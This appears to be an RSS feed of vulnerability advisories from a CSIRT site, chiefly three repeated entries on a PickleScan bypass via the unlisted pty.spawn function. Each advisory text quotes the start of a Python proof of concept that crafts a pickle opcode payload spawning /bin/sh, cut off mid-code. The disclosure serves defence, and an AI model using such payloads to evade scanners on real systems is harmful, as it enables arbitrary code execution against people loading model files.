<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 08 Oct 2026 21:40:59 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-328543</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-328543</link>
      <description>EUVD-2026-328543</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-328543</guid>
    </item>
    <item>
      <title>fkie_cve-2025-71322</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-71322</link>
      <description>&lt;p&gt;PickleScan before 0.0.33 fails to include the pty.spawn function in its unsafe globals list, allowing attackers to bypass security checks. Malicious actors can craft pickle payloads using pty.spawn to achieve arbitrary code execution when files are processed by PickleScan.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;PickleScan before 0.0.33 fails to include the pty.spawn function in its unsafe globals list, allowing attackers to bypass security checks. Malicious actors can craft pickle payloads using pty.spawn to achieve arbitrary code execution when files are processed by PickleScan.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-71322</guid>
    </item>
    <item>
      <title>GHSA-hgrh-qx5j-jfwx — Picklescan Bypasses Unsafe Globals Check using pty.spawn</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-hgrh-qx5j-jfwx</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Summary
The vulnerability allows malicious actors to bypass PickleScan&amp;#39;s unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the `pty` library (more specifically, of  the `pty.spawn` function) from PickleScan&amp;#39;s list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.&lt;/p&gt;
&lt;p&gt;### Details
For 2025&amp;#39;s [HeroCTF](https://heroctf.fr/), there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and [Fickling](https://github.com/trailofbits/fickling/) to gain code execution. The challenge [writeup](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/README.md), [files](https://github.com/HeroCTF/HeroCTF_v7/tree/master/Misc/Irreductible-2) and [solve script](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/solve.py) have all been released.&lt;/p&gt;
&lt;p&gt;The intended way was to use `pty.spawn` but some players found alternative solutions.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;- Run the following Python code to generate the PoC pickle file.&lt;/p&gt;
&lt;p&gt;```py
import pickle&lt;/p&gt;
&lt;p&gt;command = b&amp;#34;/bin/sh&amp;#34;&lt;/p&gt;
&lt;p&gt;payload = b&amp;#34;&amp;#34;.join(
    [
        pickle.PROTO + pickle.pack(&amp;#34;B&amp;#34;, 4),
        pickle.MARK,
        pickle.GLOBAL + b&amp;#34;pty\n&amp;#34; + b&amp;#34;spawn\n&amp;#34;,
        pickle.EMPTY_LIST,
        pickle.SHORT_BINUNICODE + pickle.pack(&amp;#34;B&amp;#34;, len(command)) + command,
        pickle.APPEND,
        # Additional arguments can…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Summary
The vulnerability allows malicious actors to bypass PickleScan&amp;#39;s unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the `pty` library (more specifically, of  the `pty.spawn` function) from PickleScan&amp;#39;s list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.&lt;/p&gt;
&lt;p&gt;### Details
For 2025&amp;#39;s [HeroCTF](https://heroctf.fr/), there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and [Fickling](https://github.com/trailofbits/fickling/) to gain code execution. The challenge [writeup](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/README.md), [files](https://github.com/HeroCTF/HeroCTF_v7/tree/master/Misc/Irreductible-2) and [solve script](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/solve.py) have all been released.&lt;/p&gt;
&lt;p&gt;The intended way was to use `pty.spawn` but some players found alternative solutions.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;- Run the following Python code to generate the PoC pickle file.&lt;/p&gt;
&lt;p&gt;```py
import pickle&lt;/p&gt;
&lt;p&gt;command = b&amp;#34;/bin/sh&amp;#34;&lt;/p&gt;
&lt;p&gt;payload = b&amp;#34;&amp;#34;.join(
    [
        pickle.PROTO + pickle.pack(&amp;#34;B&amp;#34;, 4),
        pickle.MARK,
        pickle.GLOBAL + b&amp;#34;pty\n&amp;#34; + b&amp;#34;spawn\n&amp;#34;,
        pickle.EMPTY_LIST,
        pickle.SHORT_BINUNICODE + pickle.pack(&amp;#34;B&amp;#34;, len(command)) + command,
        pickle.APPEND,
        # Additional arguments can…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-hgrh-qx5j-jfwx</guid>
    </item>
    <item>
      <title>PYSEC-2026-1790 — Picklescan Bypasses Unsafe Globals Check using pty.spawn</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2026-1790</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Summary
The vulnerability allows malicious actors to bypass PickleScan&amp;#39;s unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the `pty` library (more specifically, of  the `pty.spawn` function) from PickleScan&amp;#39;s list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.&lt;/p&gt;
&lt;p&gt;### Details
For 2025&amp;#39;s [HeroCTF](https://heroctf.fr/), there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and [Fickling](https://github.com/trailofbits/fickling/) to gain code execution. The challenge [writeup](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/README.md), [files](https://github.com/HeroCTF/HeroCTF_v7/tree/master/Misc/Irreductible-2) and [solve script](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/solve.py) have all been released.&lt;/p&gt;
&lt;p&gt;The intended way was to use `pty.spawn` but some players found alternative solutions.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;- Run the following Python code to generate the PoC pickle file.&lt;/p&gt;
&lt;p&gt;```py
import pickle&lt;/p&gt;
&lt;p&gt;command = b&amp;#34;/bin/sh&amp;#34;&lt;/p&gt;
&lt;p&gt;payload = b&amp;#34;&amp;#34;.join(
    [
        pickle.PROTO + pickle.pack(&amp;#34;B&amp;#34;, 4),
        pickle.MARK,
        pickle.GLOBAL + b&amp;#34;pty\n&amp;#34; + b&amp;#34;spawn\n&amp;#34;,
        pickle.EMPTY_LIST,
        pickle.SHORT_BINUNICODE + pickle.pack(&amp;#34;B&amp;#34;, len(command)) + command,
        pickle.APPEND,
        # Additional arguments can…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Summary
The vulnerability allows malicious actors to bypass PickleScan&amp;#39;s unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the `pty` library (more specifically, of  the `pty.spawn` function) from PickleScan&amp;#39;s list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.&lt;/p&gt;
&lt;p&gt;### Details
For 2025&amp;#39;s [HeroCTF](https://heroctf.fr/), there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and [Fickling](https://github.com/trailofbits/fickling/) to gain code execution. The challenge [writeup](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/README.md), [files](https://github.com/HeroCTF/HeroCTF_v7/tree/master/Misc/Irreductible-2) and [solve script](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/solve.py) have all been released.&lt;/p&gt;
&lt;p&gt;The intended way was to use `pty.spawn` but some players found alternative solutions.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;- Run the following Python code to generate the PoC pickle file.&lt;/p&gt;
&lt;p&gt;```py
import pickle&lt;/p&gt;
&lt;p&gt;command = b&amp;#34;/bin/sh&amp;#34;&lt;/p&gt;
&lt;p&gt;payload = b&amp;#34;&amp;#34;.join(
    [
        pickle.PROTO + pickle.pack(&amp;#34;B&amp;#34;, 4),
        pickle.MARK,
        pickle.GLOBAL + b&amp;#34;pty\n&amp;#34; + b&amp;#34;spawn\n&amp;#34;,
        pickle.EMPTY_LIST,
        pickle.SHORT_BINUNICODE + pickle.pack(&amp;#34;B&amp;#34;, len(command)) + command,
        pickle.APPEND,
        # Additional arguments can…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2026-1790</guid>
    </item>
  </channel>
</rss>
